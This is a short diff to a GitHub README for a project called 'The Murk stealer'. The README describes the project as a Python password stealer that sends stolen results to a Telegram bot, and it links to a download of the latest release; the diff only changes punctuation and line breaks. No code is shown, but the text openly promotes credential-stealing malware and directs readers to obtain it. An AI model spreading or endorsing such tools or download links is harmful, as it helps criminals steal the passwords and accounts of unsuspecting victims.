Choomai/The-Murk-stealer/README.md

 PASSWORD STEALER
 ---
-Stealer written on Python, results will be sent to Telegram bot [Download the latest release](https://github.com/Nick-Vinesmoke/The-Murk-stealer-on-python/releases/tag/The_Murk_v2.0.0-2.9.9)
+Stealer written on Python, results will be sent to Telegram bot.
+[Download the latest release](https://github.com/Nick-Vinesmoke/The-Murk-stealer-on-python/releases/tag/The_Murk_v2.0.0-2.9.9)

 ***